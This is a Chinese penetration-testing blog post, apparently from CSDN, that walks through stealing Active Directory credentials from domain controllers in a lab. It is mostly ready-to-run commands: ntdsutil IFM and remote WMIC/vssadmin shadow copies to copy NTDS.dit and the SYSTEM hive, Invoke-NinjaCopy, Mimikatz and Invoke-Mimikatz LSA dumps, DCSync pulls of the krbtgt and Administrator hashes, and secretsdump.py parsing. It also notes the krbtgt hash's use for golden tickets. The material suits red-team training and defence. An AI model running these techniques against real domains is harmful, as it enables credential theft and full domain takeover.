从域控制器中提取Active Directory数据库(NTDS.DIT)

最新推荐文章于 2023-08-21 11:00:00 发布
最新推荐文章于 2023-08-21 11:00:00 发布
阅读量2.6k 收藏 4
点赞数
分类专栏: 渗透测试 内网渗透 Windows 文章标签: 内网渗透 红队 域渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ping_Pig/article/details/108914583
版权
内网渗透 同时被 3 个专栏收录
34 篇文章 12 订阅
订阅专栏
Windows
32 篇文章 11 订阅
订阅专栏
渗透测试
5 篇文章 1 订阅
订阅专栏

目录

讲在前面:

本地安全机构子系统服务(LSASS)

场景思考

注意

ntds.dit介绍:https://blog.csdn.net/qq_41874930/article/details/108141331

部分方法如下:

使用NTDSUtil的Create IFM在DC上本地捕获ntds.dit文件

使用VSS卷影副本远程拉ntds.dit

使用PowerSploit的Invoke-NinjaCopy远程拉ntds.dit(需要在目标DC上启用PowerShell远程处理)

注意:

使用Mimikatz在本地转储Active Directory凭据(在DC上)

使用Invoke-Mimikatz在本地转储Active Directory凭据(在DC上)

使用Invoke-Mimikatz远程转储Active Directory凭据

使用Mimikatz的DCSync远程转储Active Directory凭据

Impacket的secretsdump.py-读取NTDS.dit内Hash

讲在前面:

从Active Directory中转储凭据的主要技术包括实时与DC上的LSASS交互,获取AD数据文件的副本(ntds.dit)或欺骗域控制器向攻击者复制密码数据(欺骗域控制器我是域控制器)
此处介绍的方法需要提升权限后才可进行,因为它们涉及连接到域控制器以转储凭据。

本地安全机构子系统服务LSASS

Microsoft Windows操作系统中的一个进程,负责在系统上实施安全策略。它验证登录到Windows计算机或服务器的用户,处理密码更改并创建访问令牌。它还写入Windows安全日志。强制终止lsass.exe将导致系统失去对任何帐户(包括NT AUTHORITY)的访问权限,从而提示重新启动计算机

场景思考

用户登录后,将生成各种凭据并将其存储在内存中的本地安全授权子系统服务LSASS进程中。这旨在促进单点登录(SSO),确保每次请求资源访问时都不会提示用户。凭据数据可能包括Kerberos票证,NTLM密码哈希,LM密码哈希(如果密码小于15个字符,取决于Windows OS版本和补丁程序级别),甚至是明文密码(以支持WDigest和SSP身份验证等)。尽管可以阻止Windows计算机在本地计算机SAM数据库(和AD数据库)中创建LM哈希,但这并不能阻止系统在内存中生成LM哈希。默认情况下,除非明确启用,否则Windows Server 2008和Windows Vista将不再为用户生成LM哈希。从Windows 8.1和Windows Server 2012 R2开始,LM哈希和“明文”密码不再存储在内存中。kb2871997中也将此功能“反向移植”到了Windows的早期版本(Windows 7/8 / 2008R2 / 2012),所以需要防止将“明文”密码放置在LSASS中。

注意

对于攻击者而言,很少希望直接在目标系统上运行代码,目前的攻击手法都可以实现不在DC上执行代码就达到获取AD所有账户密码的功能。包括针对远程系统远程运行Mimikatz以转储凭据,通过PowerShell Remoting远程使用Invoke-Mimikatz和DCSync

ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit
system文件位置:C:\Windows\System32\config\SYSTEM
sam文件位置:C:\Windows\System32\config\SAM

ntds.dit介绍:https://blog.csdn.net/qq_41874930/article/details/108141331

部分方法如下:

环境:

  • DC:Windows2016
  • DC:Windows2008
  • 客户机:Win7

注:此处因其介绍的如下方法本身都需要提权后才可进行操作,故笔者部分操作直接在域控上进行操作,望见谅。

笔者在第一次使用该方法时,大家将其称为给域控拍一个快照。

NTDSUtil是一个命令实用程序,用于域控制器处理AD DB (ntdd .dit),并支持为DCPromo创建IFM设置。IFM与DCPromo一起用于“从媒体安装”,因此要升级的服务器不需要通过网络从另一个DC复制域数据。

ntdsutil “ac i ntds” “ifm” “create full c:\temp” q q

IFM集是在以下屏幕截图中c:\temp中创建的NTDS.dit数据库的副本。创建IFM时,将捕获并安装VSS快照,并将ntds.dit文件和关联的数据从其中复制到指定的目标文件夹中。

我们也可以通过WMI或PowerShell远程执行此命令。

利用WMIC(或PowerShell远程处理)创建(或复制现有)VSS

wmic  /node:10.80.0.10 /user:Administrator /password:****** process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > c:\vss.log"

VSS快照完成后,我们然后将NTDS.dit文件和系统注册表配置单元从VSS复制到DC上的c:驱动器。

wmic /node:10.80.0.10 /user:Administrator /password:***** process call create "cmd /c copy   卷影名\Windows\NTDS\NTDS.dit C:\windows\temp\NTDS.dit 2>&1 > C:\vss2.log"


wmic /node:10.80.0.10 /user:Administrator /password:*****  process call create "cmd /c copy 卷影名\Windows\System32\config\SYSTEM c:\windows\temp\SYSTEM.hive 2>&1 > C:\vss3.log"

我们将文件复制到本地计算机。

copy \\10.80.0.10\c$\windows\temp\NTDS.dit c:\NTDS.dit
copy \\10.80.0.10\c$\windows\temp\SYSTEM.hive c:\SYSTEM.hive

这里笔者未能实现通过WMIC传递Kerberos票证来执行相同的操作

Invoke-NinaCopy是一项PowerShell功能,可以利用PowerShell远程处理(必须在目标DC上启用PowerShell远程处理)从远程计算机上复制文件(即使该文件已锁定,也可以直接访问该文件)

Invoke-NinaCopy脚本简介:

Invoke-NinaCopy通过打开整个卷(例如c :)来读取句柄并解析NTFS结构,此脚本可以从NTFS卷中复制文件。只需要你拥有域管理员权限,这样你才可以绕过以下保护措施
    1.由某个进程打开但不能由其他进程打开的文件,例如NTDS.dit文件或SYSTEM注册表配置单元
    2.在文件上设置SACL标志,以在打开文件时发出警报
    3.绕过DACL,例如仅允许SYSTEM打开文件的DACL

如果指定了LocalDestination参数,该文件将被复制到本地服务器(运行脚本的服务器)上指定的文件路径。
如果指定了RemoteDestination参数,则文件将被复制到远程服务器上指定的文件路径。

开启powershell远程执行:Enable-PSRemoting
Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -ComputerName "WIN-OCBQN1EPQUF" -LocalDestination "c:\windows\temp\ntds.dit"

使用DIT Snapshot Viewer,我们可以验证是否成功获取了ntds.dit文件。

注意:

某些情况下通过Invoke-NinjaCopy复制ntds.dit可能会损坏文件

在使用mimikatz获得AD凭据后我们可以发现其中会有krbtgt用户的sid和hash,我们可以用来做黄金票据等工作

lsadump::lsa /inject

Invoke-Mimikatz是由Joe Bialek(@JosephBialek)编写的PowerSploit的一个组件,该组件将Mimikatz的所有功能合并到Powershell函数中。它“利用Mimikatz 2.0和Invoke-ReflectivePEInjection来将Mimikatz反射性地完全加载到内存中。这使您无需将Mimikatz二进制文件写入磁盘就可以执行转储凭证之类的事情。

如果Invoke-Mimikatz以适当的权限运行,并且目标计算机启用了PowerShell Remoting,则它可以从其他系统中提取凭据,以及远程执行标准的Mimikatz命令,而不会将文件拖放到远程系统上执行。

Invoke-Mimikatz可以将DLL编码的元素(32位和64位版本)换成较新的元素来进行更新

Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /inject" exit'

Invoke-Mimikatz -Command  '"privilege::debug" "LSADump::LSA /inject"' -Computer WIN-OCBQN1EPQUF.pingpig.com

DCSync之前的利用方法是在域控制器上运行Mimikatz或Invoke-Mimikatz,以获取KRBTGT密码哈希值来创建Golden Tickets。使用Mimikatz的DCSync和适当的权限,攻击者可以通过网络从域控制器中提取密码哈希以及以前的密码哈希,而无需交互式登录或复制Active Directory数据库文件(ntds.dit)。

运行DCSync需要特殊权限。管理员,域管理员或企业管理员以及域控制器计算机帐户的任何成员都可以运行DCSync来提取密码数据。请注意,默认情况下,不仅允许只读域控制器为用户提取密码数据。

DCSync

DCSync部分命令示例:

在pingpig.com域中提取krbtgt用户帐户的密码数据:

  • lsadump::dcsync /domain:pingpig.com /user:krbtgt

在pingpig.com域中提取管理员用户帐户的密码数据:

  • lsadump::dcsync /domain:pingpig.com /user:Administrator

在pingpig.com域中提取域控制器指定机器帐户的密码数据:

  • lsadump::dcsync /domain:pingpig.com /user:win7test1
lsadump::dcsync /domain:pingpig.com /user:krbtgt

lsadump::dcsync /domain:pingpig.com /user:Administrator

lsadump::dcsync /domain:pingpig.com /user:win7test1-pc$

  • Impacket的secretsdump.py-读取NTDS.dit内Hash

python secretsdump.py -system /tmp/system.hive -ntds /tmp/ntds.dit LOCAL

 

 

 

 

Ping_Pig
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022年全国职业技能大赛-网络系统管理赛项:Windows Server&AD域控信息备份
君逍遥o
11-19 1567
1.配置域控组策略及域控配置信息备份; 2.每天自动备份到本地的D盘根目录; 3.并同步复制到DFS目录下\DFSsharedir\IT\backup 目录
8、渗透——获得域控服务器的NTDS.dit文件
Fly_鹏程万里
06-11 2869
0x00 前言在之前的文章《导出当前内所有用户hash的技术整理》曾介绍过通过Volume Shadow Copy实现对ntds.dit文件的复制,可用来导出内所有用户hash。本文将尝试做系统总结,总结多种不同的方法。0x01 简介本文将要介绍以下内容:多种实现方法比较优缺点0x02 通过Volume Shadow Copy获得域控服务器NTDS.dit文件测试系统:Server 2008 ...
web获取当前计算机信息,【渗透获取环境内用户登录信息
weixin_35582180的博客
07-26 1215
之前见到有人在讨论内用户在内的机器ip怎么查呢,集思广益,结合答复及自己的观点,总结了以下内容。0x00 adfind有时候管理员会设置用户只可以登录指定的的内计算机,使用 adfind或者 powerview导出用户信息可以查看;12345678查看内用户详细信息:adfind.exe -h DNS_SERVER_IP -sc u:rcoil(目标用户)adfind.exe -h D...
[Tools]获取环境内所有用户登录信息(附源码及程序)
BraveWinds B10G
04-12 3281
博主写了一个小脚本/工具(Github下载地址包含全部源码及pyinstaller转的exe可执行程序),用来获取环境内所有用户登录信息,大家觉得不错就收下吧,欢迎交流提建议。本工具已更新,最新版请至Github下载
ntds.dit 获取内用户ntlm hash
qq_46635165的博客
11-17 2132
前提:在获取域控权限后,可以通过读取ntds.dit 获取内更多资产信息 概念: 在活动目录,所有内数据都保存在ntds.dit,存储位置为 %SystemRoot%\ntds\ntds.dit,ntds.dit包含用户名,散列值,组,OU,GPP等活动目录相关信息; 在域控主机默认自带了ntdsutil.exe ,是一个为活动目录提供管理机制的程序,使用ntdsutil.exe 用于维护活动目录等,ntdsutil.exe 支持的操作系统有win2003,win2008,win2012; 目
域控制器降级失败后如何删除ActiveDirectory的数据.rar
02-04
本篇将详细讨论当域控制器降级失败后,如何安全有效地从AD删除相关数据。 首先,了解降级域控制器的基本过程。通常,这可以通过在“Active Directory用户和计算机”或“Active Directory站点和服务”执行操作来...
cracke-dit:cracke-dit(“ Cracked It”)使在Active Directory环境执行常规密码审核变得更加容易
05-05
cracke-dit (“ Cracked It”)使在Active Directory环境执行常规密码审核变得更加容易。 确保您的用户在整个组织拥有强大的密码仍然是抵御常见攻击的最佳防线。 许多组织过高地估计了用户密码的安全性。 “ ...
Active+Directory+灾难恢复整理.pdf
02-15
Active Directory架构域控制器扮演着至关重要的角色,它们可以担当全局编录服务器、操作主机和单一域控制器等多种职责。 当面临如硬件故障、软件错误或人为操作失误等导致的灾难性状况时,系统管理员必须具备...
Active+Directory+灾难恢复归纳.pdf
12-05
3. **恢复域控制器**:根据备份内容恢复NTDS.dit数据库和事务日志文件。这可能涉及系统状态恢复,包括系统卷(SYSVOL)和其他关键系统文件。 4. **特殊角色恢复**:如果域控制器承担全局编录(GC)、操作主机(OM)或...
Active Directory管理和构架-第3部分(AD数据库的维护与操作主机角色).ppt
06-02
备份AD至关重要,通常包括备份系统状态数据,这包含了域控制器上的AD和SYSVOL文件夹、注册表、系统启动文件、类注册数据库以及认证服务数据库。备份AD可以通过Windows内置的备份向导来实现,可选择备份系统状态或...
新SAM文件-win2k活动目录数据库文件ntds.dit
SAP FICO MM顾问专栏(暂时不谈软件开发)
09-06 1423
在windows 2000操作系统,为配合企业需要,并增加windows的网络管理功能,发展了一种新类型的目录服务--活动目录(active directory),在活动目录包含了active directory所有相关资源的对象及该用户的相关信息,该的策略和其他重要的服务信息。可以说,活动目录采用了与原来NT系统完全不同的方式保存数据信息。 Windows 2000 活动目录数据实
导出域控ntds.dit文件
谢公子的博客
02-08 2858
目录 NTDS.dit 通过ntdsutil.exe提取NTDS.dit 通过vssadmin提取ntds.dit 通过vssown.vbs脚本提取ntds.dit 使用ntdsutil的IFM创建卷影拷贝 使用diskshadow导出ntds.dit 导出SYSTEM文件 主机运维人员监控卷影拷贝服务的使用情况 NTDS.dit 在活动目录,所有的数据都保存在域控的 ntd...
域控环境下获取hash值
sinat_38378265的博客
04-01 1347
实验环境:win2012(域控),win2007(客户机) 目的:使用系统自带工具ntdsutil(win2008以上)导出ntds.dit,使用软件QuarkPwdump将它破解,得到的hash值。 过程:cmd.exe输入ntdsutil进入交互式界面,输入snapshot,然后输入activate instance ntds,再输入create创建快照,输入mount+快照将快照挂载到c盘...
通过域控制器获取用户的密码_出差在外地,忘了登录密码,却想登服务器,别慌...
weixin_39914732的博客
12-05 1292
在出差用户面临的众多问题,忘记密码也是阻碍工作效率的原因之一,因为它们需要管理员的帮助。当用户登录到AD时(活动目录Active Directory)Windows会缓存凭据,将其本地存储在计算机上。缓存的目的是让用户出差或无网络的情况下,也能够登录。但是,当出差用户忘记密码时,他们无法重置密码。即便出差用户想用第三方工具重置密码,在断网的情况下也无法与域控制器通信。因此,新密码和缓存凭据...
查看在线用户和计算机,如何查看用户登陆的时间?
weixin_30853127的博客
06-16 2975
声明:本文转载自gnaw0725.blogbus.com,更新网址:http://gnaw0725.blog.51cto.com。服务器是windows server 2003,客户机是windows xp,用户都是用户。想在服务器上查看用户每次登入的时间。哪位同仁有办法?回答:您好!您需要在服务器上查看用户每次登入的时间,可以通过在服务器上开启审核登录事件的方法实现。具体设置如下:1. 开始...
【AD】破解WindowsServer2008R2 AD域控目录还原模式密码及管理员账号密码
weixin_33805992的博客
07-15 1599
(本文部分内容来源于网络,假设没有备用管理员。)一:知道管理员密码,忘记目录模式还原密码目录模式还原密码和之前的系统一样,保存在c:\windows\system32\config\sam内。破解方法有两种。1。用管理员账号登录后使用如下命令修改C:\Users\Administrator>ntdsutilntdsutil:set dsrm password重置...
为什么我们不用数据库生成 ID?
weixin_45583158的博客
01-08 738
先介绍一下背景????团队正在一个为 SQL Server 构建数据目录项目的历程,我们优化系统以实现解耦。这对我们来说非常重要,从根本上来说,我归结为两个核心原则,希望每个软件专业...
内网攻防学习Day1——常见的内网结构
最新发布
wangluoanquan111的博客
08-21 269
在实际的渗透测试过程,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。林都有根林的根创建的第一个所有树的根林的根建立可传递的信任关系.包括各种类型对象的可选及不可选的各种属性。首先要理解一下组的概念,在组里包含了很多用户,当管理员想要给某个用户分配权限时,只需要将用户加入到对应权限的组里就行,从而提高了管理效率,常见的组有:本地组、全局组、通用组。
怎么解析NTDS.dit
04-27
NTDS.dit是Windows操作系统Active Directory数据库文件的一部分。要解析NTDS.dit文件,可以使用工具如dsdbutil、ntdsutil和esentutl等。这些工具可以帮助管理员执行各种操作,例如备份和还原数据库、重建索引、检查数据库状态等。此外,可以使用一些第三方工具进行NTDS.dit文件的解析,例如Active Directory解析器和LDP工具等。这些工具可以让管理员更方便地查看和管理Active Directory数据库文件。请注意,解析NTDS.dit文件需要具备一定的技术知识和经验,并且需要谨慎执行相关操作,以避免意外损坏数据库文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值